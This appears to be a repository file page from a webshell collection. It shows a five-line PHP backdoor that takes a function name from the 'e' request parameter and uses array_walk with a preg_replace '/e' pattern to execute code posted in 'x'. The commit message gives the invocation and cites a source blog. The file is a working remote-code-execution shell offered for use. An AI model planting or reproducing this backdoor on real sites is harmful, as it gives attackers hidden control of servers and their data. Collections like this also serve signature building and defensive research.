webshell/php/2020.08.20.13.php
tennc 44282fe412
Create 2020.08.20.13.php
shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'')
use:  post x=phpinfo();
from: https://www.sqlsec.com/2020/07/shell.html
2020-08-20 12:38:26 +08:00

5 lines
104 B
PHP

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['x'] => '|.*|e',);
array_walk($arr, $e, '');
?>